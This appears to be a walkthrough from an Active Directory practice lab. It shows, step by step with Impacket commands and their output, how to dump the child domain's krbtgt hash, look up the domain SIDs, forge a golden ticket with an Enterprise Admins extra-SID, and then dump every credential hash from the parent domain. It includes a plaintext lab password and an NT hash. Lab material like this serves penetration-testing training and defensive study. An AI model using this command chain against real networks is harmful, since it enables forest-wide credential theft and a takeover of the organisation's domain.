Golden ticket + ExtraSid

• We have done the exploitation on one command with impacket raiseChild.py, now let’s just do the same but step by step and create the golden ticket.

• Full explanation on the attack can be found here : https://adsecurity.org/?p=1640

• First dump the krbtgt of the domain we own

# dump child ntds and get krbtgt NT hash
secretsdump.py -just-dc-user north/krbtgt \ 
 north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11

...
krbtgt:502:aa3b435b51404eeaad3b435b51404ee:13354bc6e1b48fff8d66a2090e909b27:::
..

• Now get the child and parent domain SID

Get SID for north.newyork.local

# dump child domain SID 
lookupsid.py  -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11 0

[*] Brute forcing SIDs at 192.168.56.11
[*] StringBinding ncacn_np:192.168.56.11[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3634065772-4036021599-3644360361

Get SID for NewYork.local

# dump parent domain SID 
lookupsid.py  -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.10 0

[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987

• And now create the golden ticket : we add “-519” at the end of the extra-sid (means enterprise admin) (list of domain SID here : https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers)

ticketer.py -nthash 13354bc6e1b48fff8d66a2090e909b27\ #krbtgt Hash
 -domain-sid S-1-5-21-3634065772-4036021599-3644360361 \ #north.newyork.local SID
 -domain north.newyork.local \
 -extra-sid S-1-5-21-620482180-1620433373-1814187987-519 \ #newyork.local SID + Extra-SID
 goldenuser

The task for you is to add the ccname and do a -no-pass like we have done before :)

export KRB5CCNAME=/home/jefe/delegation/goldenuser.ccache

• And we use the ticket to dump the parent domain NTDS

secretsdump -k -no-pass -just-dc-ntlm \
 north.newyork.local/goldenuser@nyc.newyork.local